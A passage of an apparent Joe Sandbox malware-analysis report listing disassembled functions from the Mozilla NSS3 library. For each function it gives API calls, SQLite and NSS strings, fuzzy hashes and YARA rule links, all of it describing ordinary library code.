PORT_Alloc_Util.NSS3(?), ref: 6C5DC8D5
free.MOZGLUE(00000000), ref: 6C5DC900
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C5DC9C7
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5DC9E5
free.MOZGLUE(00000000), ref: 6C5DCA5A

Strings

NSC_GetFunctionList, xrefs: 6C5DC093
NSS_ReturnModuleSpecData, xrefs: 6C5DC275
Vendor NSS FIPS Interface, xrefs: 6C5DC34A
NSC_ModuleDBFunc, xrefs: 6C5DC0FC
nss_mod_log, xrefs: 6C5DC3CC
NSS_FORCE_TOKEN_LOCK, xrefs: 6C5DC77D
PKCS 11, xrefs: 6C5DC2F9, 6C5DC314
NSS_DISABLE_UNLOAD, xrefs: 6C5DC7B0
NSS_DEBUG_PKCS11_MODULE, xrefs: 6C5DC38D
NSC_GetInterface, xrefs: 6C5DC04F
FC_GetFunctionList, xrefs: 6C5DC098
FC_GetInterface, xrefs: 6C5DC054

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Monitor$Value$Enter$CriticalExitSection$Error$LeaveLibrary$Alloc_SecureUtilfree$ArenaLastLoadUnloadstrcmp$AddressCallFlagsModuleOnceProcR_snprintfTextWideWithmemcpystrlen
String ID: FC_GetFunctionList$FC_GetInterface$NSC_GetFunctionList$NSC_GetInterface$NSC_ModuleDBFunc$NSS_DEBUG_PKCS11_MODULE$NSS_DISABLE_UNLOAD$NSS_FORCE_TOKEN_LOCK$NSS_ReturnModuleSpecData$PKCS 11$Vendor NSS FIPS Interface$nss_mod_log
API String ID: 4243957313-3613044529
Opcode ID: 43f1641be01539a6a1c176d2a81ffe283f512cb745d1020482cbf5a9b0e65171
Instruction ID: 4f5e2c0f00dc1d3916766f453236ff6d203eacd9afdf6d3bc836b8f65bd60a2c
Opcode Fuzzy Hash: 43f1641be01539a6a1c176d2a81ffe283f512cb745d1020482cbf5a9b0e65171
Instruction Fuzzy Hash: 894258F2B003049BDB00DF99DC8AB5A3BB5BB46348F16406DD8059BB21EB31F955CB99

Function 6C6B3FC0 Relevance: 70.5, APIs: 37, Strings: 3, Instructions: 485stringprocessCOMMON

Download Yara Rule

APIs

malloc.MOZGLUE(00000008), ref: 6C6B3FD5
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6B3FFE
malloc.MOZGLUE(-00000003), ref: 6C6B4016
strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,6C6EFC62), ref: 6C6B404A
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C6B407E
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C6B40A4
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C6B40D7
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C6B4112
malloc.MOZGLUE(00000000), ref: 6C6B411E
__p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 6C6B414D
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C6B4160
free.MOZGLUE(?), ref: 6C6B416C
malloc.MOZGLUE(?), ref: 6C6B41AB
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NSPR_INHERIT_FDS=,00000011), ref: 6C6B41EF
qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,00000004,6C6B4520), ref: 6C6B4244
GetEnvironmentStrings.KERNEL32 ref: 6C6B424D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B4263
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B4283
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6B42B7
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B42E4
malloc.MOZGLUE(00000002), ref: 6C6B42FA
FreeEnvironmentStringsA.KERNEL32(?), ref: 6C6B4342
GetStdHandle.KERNEL32(000000F6), ref: 6C6B43AB
GetStdHandle.KERNEL32(000000F5), ref: 6C6B43B2
GetStdHandle.KERNEL32(000000F4), ref: 6C6B43B9
FreeEnvironmentStringsA.KERNEL32(?), ref: 6C6B4403
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C6B4410

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 6C6B445E
CloseHandle.KERNEL32(?), ref: 6C6B446B
free.MOZGLUE(?), ref: 6C6B4482
free.MOZGLUE(00000000), ref: 6C6B4492
free.MOZGLUE(00000000), ref: 6C6B44A4
GetLastError.KERNEL32 ref: 6C6B44B2
PR_SetError.NSS3(FFFFE896,00000000), ref: 6C6B44BE
free.MOZGLUE(?), ref: 6C6B44C7
free.MOZGLUE(00000000), ref: 6C6B44D5
free.MOZGLUE(00000000), ref: 6C6B44EA

Strings

NSPR_INHERIT_FDS=, xrefs: 6C6B41E9
D, xrefs: 6C6B4396
=, xrefs: 6C6B44F8

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$Errormallocstrlen$Handle$EnvironmentStringsmemset$Free$CloseCreateLastProcessValue__p__environqsortstrncmpstrpbrk
String ID: =$D$NSPR_INHERIT_FDS=
API String ID: 3116300875-3553733109
Opcode ID: 076c0b7a57ad045ff5a2f456c4130d5122462f4a079c6f1472a1e064aa47b2ff
Instruction ID: 4911a97d7b45714bb7c09209876c5716c0338aa474c09a331d4375ffac595b85
Opcode Fuzzy Hash: 076c0b7a57ad045ff5a2f456c4130d5122462f4a079c6f1472a1e064aa47b2ff
Instruction Fuzzy Hash: 7802F871E053119FEB108F69C8807BEBBB5AF16308F244129DC6AB7741D7B1E825CB99

Function 6C5C6D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6C6CA8EC,0000006C), ref: 6C5C6DC6
memcpy.VCRUNTIME140(?,6C6CA958,0000006C), ref: 6C5C6DDB
memcpy.VCRUNTIME140(?,6C6CA9C4,00000078), ref: 6C5C6DF1
memcpy.VCRUNTIME140(?,6C6CAA3C,0000006C), ref: 6C5C6E06
memcpy.VCRUNTIME140(?,6C6CAAA8,00000060), ref: 6C5C6E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5C6E38

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6C5C6E76
TlsGetValue.KERNEL32 ref: 6C5C726F
EnterCriticalSection.KERNEL32(?), ref: 6C5C7283

Strings

!, xrefs: 6C5C7123

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: 0cd8b2ba794369135539c946b4cab23e81741e0f0116ce0ece735955657d9501
Instruction ID: 1258ab759bc6e55fc5b66cf77c38fc07e91f16bfd82fdd6951a519d4ca7cca38
Opcode Fuzzy Hash: 0cd8b2ba794369135539c946b4cab23e81741e0f0116ce0ece735955657d9501
Instruction Fuzzy Hash: 08728DB5E052199FDB60DF68CC8879ABBB5EB49304F1041EDD80DA7701EB319A84CF92

Function 6C533C40 Relevance: 41.2, APIs: 20, Strings: 3, Instructions: 932COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C533C66
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C533D04
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C533EAD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C533ED7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C533F74
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C534052
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C53406F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C53410D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011A47,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C53449C

Strings

%s at line %d of [%.10s], xrefs: 6C534495, 6C5344F9, 6C53459E, 6C534769, 6C534809
database corruption, xrefs: 6C534490, 6C5344F4, 6C534599, 6C534764, 6C534804
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C534452, 6C534486, 6C5344EA, 6C534571, 6C534580, 6C53458F, 6C53475A, 6C5347FA

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: _byteswap_ulong$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2597148001-598938438
Opcode ID: ad17a1cb0f01b815709bfcabc6d6744ec9c11156462e353223e23cc74563f1f5
Instruction ID: 6ac0938b1bea0830f08bfb4bb47a48384971e89f1fd21102009d5643ab305f06
Opcode Fuzzy Hash: ad17a1cb0f01b815709bfcabc6d6744ec9c11156462e353223e23cc74563f1f5
Instruction Fuzzy Hash: 9A829475A00225CFCB04CF69C880B9D7BF1BF89318F2555A9D909ABB51E732EC42CB95

Function 6C60AC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C60ACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C60ACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C60ACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C60AD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C60ADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C60ADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C60ADF0

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C60B06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C60B08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C60B1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C60B27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6C60B2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C60B3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C60B40C

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: ff25f1e4c1894cd89fe45137c25de40aa6ae4acfaf7b587f29e31c253f4e89ab
Instruction ID: f20452340a6bf584eae67b8c4fc25017e2e29c4e53820fb6f92f7bd980d8dbf1
Opcode Fuzzy Hash: ff25f1e4c1894cd89fe45137c25de40aa6ae4acfaf7b587f29e31c253f4e89ab
Instruction Fuzzy Hash: E222A071A04301AFE714CF14CD40B9A77E1AF8430CF24857CE9596B7A2E772E859CB9A

Function 6C551F90 Relevance: 35.9, APIs: 5, Strings: 18, Instructions: 1430COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C5525F3

Strings

a NATURAL join may not have an ON or USING clause, xrefs: 6C5532C1
access to view "%s" prohibited, xrefs: 6C552F4A
no such index: "%s", xrefs: 6C55319D
'%s' is not a function, xrefs: 6C552FD2
cannot have both ON and USING clauses in the same join, xrefs: 6C5532B5
H, xrefs: 6C55329F
unsafe use of virtual table "%s", xrefs: 6C5530D1
no tables specified, xrefs: 6C5526BE
no such table: %s, xrefs: 6C5526AC
H, xrefs: 6C55322D
too many references to "%s": max 65535, xrefs: 6C552FB6
multiple recursive references: %s, xrefs: 6C5522E0
cannot join using column %s - column not present in both tables, xrefs: 6C5532AB
recursive reference in a subquery: %s, xrefs: 6C5522E5
%s.%s, xrefs: 6C552D68
too many columns in result set, xrefs: 6C553012
%s.%s.%s, xrefs: 6C55302D
table %s has %d values for %d columns, xrefs: 6C55316C

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memcpy
String ID: %s.%s$%s.%s.%s$'%s' is not a function$H$H$a NATURAL join may not have an ON or USING clause$access to view "%s" prohibited$cannot have both ON and USING clauses in the same join$cannot join using column %s - column not present in both tables$multiple recursive references: %s$no such index: "%s"$no such table: %s$no tables specified$recursive reference in a subquery: %s$table %s has %d values for %d columns$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
API String ID: 3510742995-3400015513
Opcode ID: f171b006c0dcd9b5785afba526bda94025831cc0076bdae94495e94e83539fa0
Instruction ID: 4aae9a17322ba968f48e2296fcb00104bc0ed80d0fa4255e9b66cf89e912e51d
Opcode Fuzzy Hash: f171b006c0dcd9b5785afba526bda94025831cc0076bdae94495e94e83539fa0
Instruction Fuzzy Hash: 2FD28F74E04209CFDB04CF95CC94B9DB7B1FF89308F68816AD819ABB52D731A856CB50

Function 6C58ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C58ED38

Part of subcall function 6C524F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C524FC4

sqlite3_mprintf.NSS3(snippet), ref: 6C58EF3C
sqlite3_mprintf.NSS3(offsets), ref: 6C58EFE4

Part of subcall function 6C64DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C525001,?,00000003,00000000), ref: 6C64DFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6C58F087
sqlite3_mprintf.NSS3(matchinfo), ref: 6C58F129
sqlite3_mprintf.NSS3(optimize), ref: 6C58F1D1
sqlite3_free.NSS3(?), ref: 6C58F368

Strings

fts3, xrefs: 6C58F247
porter, xrefs: 6C58ED97
snippet, xrefs: 6C58EF05, 6C58EF37, 6C58EF7C
fts3_tokenizer, xrefs: 6C58EE1A, 6C58EEA8
unicode61, xrefs: 6C58EDB5
fts4, xrefs: 6C58F2AD
simple, xrefs: 6C58ED79
matchinfo, xrefs: 6C58F04F, 6C58F082, 6C58F0C2, 6C58F0F2, 6C58F124, 6C58F169
fts3tokenize, xrefs: 6C58F30F
fts4aux, xrefs: 6C58ECF9
optimize, xrefs: 6C58F199, 6C58F1CC, 6C58F211
offsets, xrefs: 6C58EFAF, 6C58EFDF, 6C58F01F

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: 01eaa1d7ea45043a21d1883af7745a491d97f1d41e49535b01901dc3cb69ba4b
Instruction ID: adb409122521a03fdf3cf34af91477346d28da46ed83a7efa07b9173c7d2bbed
Opcode Fuzzy Hash: 01eaa1d7ea45043a21d1883af7745a491d97f1d41e49535b01901dc3cb69ba4b
Instruction Fuzzy Hash: 5A02E1B5B053108BE7049F31AC8572B36B2BFC9708F148A3CD85A97B41EF74E8468796

Function 6C607C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C607C33
NSS_OptionGet.NSS3(0000000C,00000000), ref: 6C607C66
CERT_DestroyCertificate.NSS3(00000000), ref: 6C607D1E

Part of subcall function 6C607870: SECOID_FindOID_Util.NSS3(?,?,?,6C6091C5), ref: 6C60788F

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C607D48
PR_SetError.NSS3(FFFFE067,00000000), ref: 6C607D71
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C607DD3
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C607DE1
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C607DF8
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C607E1A
PR_SetError.NSS3(FFFFE067,00000000), ref: 6C607E58

Part of subcall function 6C607870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6091C5), ref: 6C6078BB
Part of subcall function 6C607870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C6091C5), ref: 6C6078FA
Part of subcall function 6C607870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C6091C5), ref: 6C607930
Part of subcall function 6C607870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6091C5), ref: 6C607951
Part of subcall function 6C607870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C607964
Part of subcall function 6C607870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C60797A
Part of subcall function 6C607870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C607988
Part of subcall function 6C607870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C607998
Part of subcall function 6C607870: free.MOZGLUE(00000000), ref: 6C6079A7
Part of subcall function 6C607870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C6091C5), ref: 6C6079BB
Part of subcall function 6C607870: PR_GetCurrentThread.NSS3(?,?,?,?,6C6091C5), ref: 6C6079CA

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C607E49
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C607F8C
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C607F98
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C607FBF
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C607FD9
PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6C608038
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C608050
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C608093
SECOID_FindOID_Util.NSS3 ref: 6C607F29

Part of subcall function 6C6007B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C5A8298,?,?,?,6C59FCE5,?), ref: 6C6007BF
Part of subcall function 6C6007B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6007E6
Part of subcall function 6C6007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C60081B
Part of subcall function 6C6007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C600825

SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C608072
SECOID_FindOID_Util.NSS3 ref: 6C6080F5

Part of subcall function 6C60BC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C60800A,00000000,?,00000000,?), ref: 6C60BC3F

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
String ID:
API String ID: 2815116071-0
Opcode ID: 19a9e43261c995d3b04c83c350f785470b64be68322fdab98767ff2bcdcc6570
Instruction ID: 2146c7b8723740bfcab405e7584ba16b1c10b2e33a79c2885faf9db09e9d3784
Opcode Fuzzy Hash: 19a9e43261c995d3b04c83c350f785470b64be68322fdab98767ff2bcdcc6570
Instruction Fuzzy Hash: E1E1A0707053009FD708CF28DA80B5B77E5AF89308F14496DE98AABB61E731EC15CB5A

Function 6C591C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6C591C6B
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C591C75
GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6C591CA1
GetLengthSid.ADVAPI32(?), ref: 6C591CA9
malloc.MOZGLUE(00000000), ref: 6C591CB4
CopySid.ADVAPI32(00000000,00000000,?), ref: 6C591CCC
GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6C591CE4
GetLengthSid.ADVAPI32(?), ref: 6C591CEC
malloc.MOZGLUE(00000000), ref: 6C591CFD
CopySid.ADVAPI32(00000000,00000000,?), ref: 6C591D0F
CloseHandle.KERNEL32(?), ref: 6C591D17
AllocateAndInitializeSid.ADVAPI32 ref: 6C591D4D
GetLastError.KERNEL32 ref: 6C591D73
PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6C591D7F

Strings

_PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6C591D7A

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
API String ID: 3748115541-1216436346
Opcode ID: 9a13272f2321a34b37740b6b7901b762c858190ffcc884328333ee4b1fed4f3d
Instruction ID: c9f2d5d48a8e5cf433564193a698d7ef5b34359a76eaa51829536c2eeab844d7
Opcode Fuzzy Hash: 9a13272f2321a34b37740b6b7901b762c858190ffcc884328333ee4b1fed4f3d
Instruction Fuzzy Hash: 353168B5600218AFDF20DF65DC88BAA7BB9FF49344F004165F51992550EB305994CF5D

Function 6C593D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C593DFB
__allrem.LIBCMT ref: 6C593EEC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C593FA3
memcpy.VCRUNTIME140(?,?,00000001), ref: 6C594047
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C5940DE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C59415F
__allrem.LIBCMT ref: 6C59416B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C594288
